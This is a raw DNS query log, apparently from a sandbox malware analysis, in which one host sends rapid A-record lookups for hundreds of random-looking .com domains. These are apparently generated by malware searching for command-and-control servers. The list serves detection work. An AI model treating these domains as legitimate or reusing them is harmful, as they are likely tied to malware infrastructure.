                                                                                                                                                                                                              Aug 23, 2024 18:48:55.209112883 CEST192.168.2.41.1.1.10x1dc5Standard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.209477901 CEST192.168.2.41.1.1.10xab05Standard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.209649086 CEST192.168.2.41.1.1.10x2a4Standard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.210834026 CEST192.168.2.41.1.1.10xd63fStandard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.211165905 CEST192.168.2.41.1.1.10x4f76Standard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.211494923 CEST192.168.2.41.1.1.10x4f8fStandard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.212141037 CEST192.168.2.41.1.1.10x4321Standard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.212472916 CEST192.168.2.41.1.1.10x3a0Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.212673903 CEST192.168.2.41.1.1.10xd00Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.213300943 CEST192.168.2.41.1.1.10x4878Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.220673084 CEST192.168.2.41.1.1.10x7e91Standard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.220879078 CEST192.168.2.41.1.1.10x283eStandard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.221239090 CEST192.168.2.41.1.1.10xaab2Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.221391916 CEST192.168.2.41.1.1.10xc2b0Standard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.231272936 CEST192.168.2.41.1.1.10xea2dStandard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.238279104 CEST192.168.2.41.1.1.10xf4a5Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.238846064 CEST192.168.2.41.1.1.10x39a6Standard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.239262104 CEST192.168.2.41.1.1.10x71aaStandard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.240865946 CEST192.168.2.41.1.1.10xc879Standard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.241347075 CEST192.168.2.41.1.1.10x51fbStandard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.242312908 CEST192.168.2.41.1.1.10xc19cStandard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.242774963 CEST192.168.2.41.1.1.10xeb17Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.246151924 CEST192.168.2.41.1.1.10x61d2Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.247128010 CEST192.168.2.41.1.1.10xdcd7Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.247745991 CEST192.168.2.41.1.1.10x7cc4Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.248130083 CEST192.168.2.41.1.1.10x1e02Standard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.249432087 CEST192.168.2.41.1.1.10xbdd1Standard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.250950098 CEST192.168.2.41.1.1.10x3816Standard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.251462936 CEST192.168.2.41.1.1.10x1eceStandard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.253140926 CEST192.168.2.41.1.1.10x8145Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.254193068 CEST192.168.2.41.1.1.10x5e1dStandard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.254757881 CEST192.168.2.41.1.1.10x906cStandard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.255146027 CEST192.168.2.41.1.1.10xfb7bStandard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.255467892 CEST192.168.2.41.1.1.10x9beStandard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.256352901 CEST192.168.2.41.1.1.10x3b34Standard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.256737947 CEST192.168.2.41.1.1.10x6f52Standard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.257247925 CEST192.168.2.41.1.1.10x57b1Standard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.741251945 CEST192.168.2.41.1.1.10x95a7Standard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.742098093 CEST192.168.2.41.1.1.10x6022Standard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.743108034 CEST192.168.2.41.1.1.10x8857Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.743738890 CEST192.168.2.41.1.1.10xe58fStandard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.744199991 CEST192.168.2.41.1.1.10x20e2Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.744570017 CEST192.168.2.41.1.1.10x2d2cStandard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.745035887 CEST192.168.2.41.1.1.10xf87fStandard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.745122910 CEST192.168.2.41.1.1.10x4af9Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.745649099 CEST192.168.2.41.1.1.10xd617Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.746109009 CEST192.168.2.41.1.1.10x8a5Standard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.746295929 CEST192.168.2.41.1.1.10xa209Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.746746063 CEST192.168.2.41.1.1.10xdccfStandard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.746923923 CEST192.168.2.41.1.1.10xf834Standard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.747284889 CEST192.168.2.41.1.1.10xe230Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.747801065 CEST192.168.2.41.1.1.10x9a8aStandard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.747968912 CEST192.168.2.41.1.1.10xf87bStandard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.748317003 CEST192.168.2.41.1.1.10xcf36Standard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.748897076 CEST192.168.2.41.1.1.10xd34cStandard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.748970032 CEST192.168.2.41.1.1.10x6d27Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.749465942 CEST192.168.2.41.1.1.10x6392Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.749582052 CEST192.168.2.41.1.1.10xa5e8Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.750097036 CEST192.168.2.41.1.1.10x780Standard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.750538111 CEST192.168.2.41.1.1.10xd951Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.750761032 CEST192.168.2.41.1.1.10xb811Standard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.751210928 CEST192.168.2.41.1.1.10xb32aStandard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.751666069 CEST192.168.2.41.1.1.10x389eStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.752047062 CEST192.168.2.41.1.1.10x8b3aStandard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.752597094 CEST192.168.2.41.1.1.10x9584Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.752736092 CEST192.168.2.41.1.1.10xc073Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.753266096 CEST192.168.2.41.1.1.10xa505Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.753266096 CEST192.168.2.41.1.1.10x8fdStandard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.753997087 CEST192.168.2.41.1.1.10x870dStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.754148006 CEST192.168.2.41.1.1.10x3cadStandard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.754668951 CEST192.168.2.41.1.1.10x2c4dStandard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.754940987 CEST192.168.2.41.1.1.10x5efStandard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.755642891 CEST192.168.2.41.1.1.10x2514Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.755712986 CEST192.168.2.41.1.1.10x8a86Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.756203890 CEST192.168.2.41.1.1.10x8f24Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.756644011 CEST192.168.2.41.1.1.10x933Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.757245064 CEST192.168.2.41.1.1.10xb1b3Standard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.757791996 CEST192.168.2.41.1.1.10xd7dStandard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.758251905 CEST192.168.2.41.1.1.10x87a8Standard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.758464098 CEST192.168.2.41.1.1.10x81eaStandard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.758802891 CEST192.168.2.41.1.1.10x3a4eStandard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.760114908 CEST192.168.2.41.1.1.10xfb8eStandard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.760230064 CEST192.168.2.41.1.1.10xec12Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.761459112 CEST192.168.2.41.1.1.10x47daStandard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.761537075 CEST192.168.2.41.1.1.10xff3dStandard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.761653900 CEST192.168.2.41.1.1.10x7cd6Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.761811018 CEST192.168.2.41.1.1.10xe0eeStandard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.761919022 CEST192.168.2.41.1.1.10xe11eStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.762080908 CEST192.168.2.41.1.1.10x2d20Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.762274027 CEST192.168.2.41.1.1.10xfbabStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.762492895 CEST192.168.2.41.1.1.10x60a1Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.762578011 CEST192.168.2.41.1.1.10xd2c4Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.762727976 CEST192.168.2.41.1.1.10x1c4fStandard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.762939930 CEST192.168.2.41.1.1.10xb429Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.763025045 CEST192.168.2.41.1.1.10xd5dbStandard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.763315916 CEST192.168.2.41.1.1.10x1130Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.763518095 CEST192.168.2.41.1.1.10xae74Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.763880968 CEST192.168.2.41.1.1.10x32cfStandard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.764007092 CEST192.168.2.41.1.1.10x1506Standard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.764122963 CEST192.168.2.41.1.1.10xcd8aStandard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.764341116 CEST192.168.2.41.1.1.10xe2f2Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.801491022 CEST192.168.2.41.1.1.10x693eStandard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.802109957 CEST192.168.2.41.1.1.10xfc03Standard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.802692890 CEST192.168.2.41.1.1.10x6d9fStandard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.803289890 CEST192.168.2.41.1.1.10xf431Standard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.804121971 CEST192.168.2.41.1.1.10x9dccStandard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.804783106 CEST192.168.2.41.1.1.10xbc65Standard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.805429935 CEST192.168.2.41.1.1.10x208cStandard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.805819035 CEST192.168.2.41.1.1.10xb3ecStandard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.806212902 CEST192.168.2.41.1.1.10xdc8bStandard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.806632996 CEST192.168.2.41.1.1.10xb0e7Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.806802988 CEST192.168.2.41.1.1.10x890dStandard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.807542086 CEST192.168.2.41.1.1.10x58dcStandard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.807542086 CEST192.168.2.41.1.1.10xb31eStandard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.807985067 CEST192.168.2.41.1.1.10x5139Standard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.808262110 CEST192.168.2.41.1.1.10xfbd4Standard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.808698893 CEST192.168.2.41.1.1.10x5dfbStandard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.809022903 CEST192.168.2.41.1.1.10x24b6Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.809190989 CEST192.168.2.41.1.1.10x98d4Standard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.809591055 CEST192.168.2.41.1.1.10x275fStandard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.810278893 CEST192.168.2.41.1.1.10xd40cStandard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.810317039 CEST192.168.2.41.1.1.10xaa8Standard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.810864925 CEST192.168.2.41.1.1.10x9e0fStandard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.810952902 CEST192.168.2.41.1.1.10x16a1Standard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.811564922 CEST192.168.2.41.1.1.10xc83dStandard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.811839104 CEST192.168.2.41.1.1.10x306fStandard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.812417030 CEST192.168.2.41.1.1.10xde21Standard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.812603951 CEST192.168.2.41.1.1.10x4c18Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.812944889 CEST192.168.2.41.1.1.10x18e8Standard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.813354015 CEST192.168.2.41.1.1.10x85bbStandard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.813709974 CEST192.168.2.41.1.1.10x54a1Standard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.813904047 CEST192.168.2.41.1.1.10xdd4fStandard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.814441919 CEST192.168.2.41.1.1.10x3788Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.814883947 CEST192.168.2.41.1.1.10xa31dStandard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.815319061 CEST192.168.2.41.1.1.10xe4efStandard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.815689087 CEST192.168.2.41.1.1.10xda3aStandard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.816230059 CEST192.168.2.41.1.1.10x45bcStandard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.816581964 CEST192.168.2.41.1.1.10xc860Standard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.817003012 CEST192.168.2.41.1.1.10xdfc5Standard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.817471981 CEST192.168.2.41.1.1.10x6fd8Standard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.817730904 CEST192.168.2.41.1.1.10x9f6aStandard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.820060015 CEST192.168.2.41.1.1.10x3eb6Standard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.821233988 CEST192.168.2.41.1.1.10x252bStandard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.821407080 CEST192.168.2.41.1.1.10xd887Standard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.821441889 CEST192.168.2.41.1.1.10x6f35Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.821652889 CEST192.168.2.41.1.1.10x4655Standard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.821795940 CEST192.168.2.41.1.1.10x610fStandard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.821943998 CEST192.168.2.41.1.1.10x283fStandard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.822104931 CEST192.168.2.41.1.1.10x45d5Standard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.822258949 CEST192.168.2.41.1.1.10xfbf4Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.822412014 CEST192.168.2.41.1.1.10x4ed8Standard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.822550058 CEST192.168.2.41.1.1.10x9172Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.822819948 CEST192.168.2.41.1.1.10x4360Standard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.823225021 CEST192.168.2.41.1.1.10xf878Standard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.823262930 CEST192.168.2.41.1.1.10xec60Standard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.823445082 CEST192.168.2.41.1.1.10xe3c0Standard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.823606968 CEST192.168.2.41.1.1.10x2182Standard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.823877096 CEST192.168.2.41.1.1.10x5d41Standard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.824091911 CEST192.168.2.41.1.1.10x67fbStandard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.824091911 CEST192.168.2.41.1.1.10xab83Standard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.824264050 CEST192.168.2.41.1.1.10xd4adStandard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.824430943 CEST192.168.2.41.1.1.10xe1cbStandard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.824613094 CEST192.168.2.41.1.1.10x92f4Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.824841976 CEST192.168.2.41.1.1.10x569cStandard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.824898958 CEST192.168.2.41.1.1.10xb83eStandard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.993474007 CEST192.168.2.41.1.1.10x60a3Standard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.994020939 CEST192.168.2.41.1.1.10xd0d8Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.994740009 CEST192.168.2.41.1.1.10x6a62Standard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.995668888 CEST192.168.2.41.1.1.10x1cfdStandard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.996340036 CEST192.168.2.41.1.1.10xfd8aStandard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.996675014 CEST192.168.2.41.1.1.10xc948Standard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.997113943 CEST192.168.2.41.1.1.10x77c4Standard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.997519016 CEST192.168.2.41.1.1.10xc00eStandard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.997766018 CEST192.168.2.41.1.1.10x6c0eStandard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.998028040 CEST192.168.2.41.1.1.10x40a5Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.998550892 CEST192.168.2.41.1.1.10xb4d4Standard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.999058008 CEST192.168.2.41.1.1.10x33acStandard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.999162912 CEST192.168.2.41.1.1.10x1f40Standard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.999572039 CEST192.168.2.41.1.1.10xbb57Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.999849081 CEST192.168.2.41.1.1.10xda21Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.000056982 CEST192.168.2.41.1.1.10x9b7cStandard query (0)qexyluq.comA (IP address)IN (0x0001)false
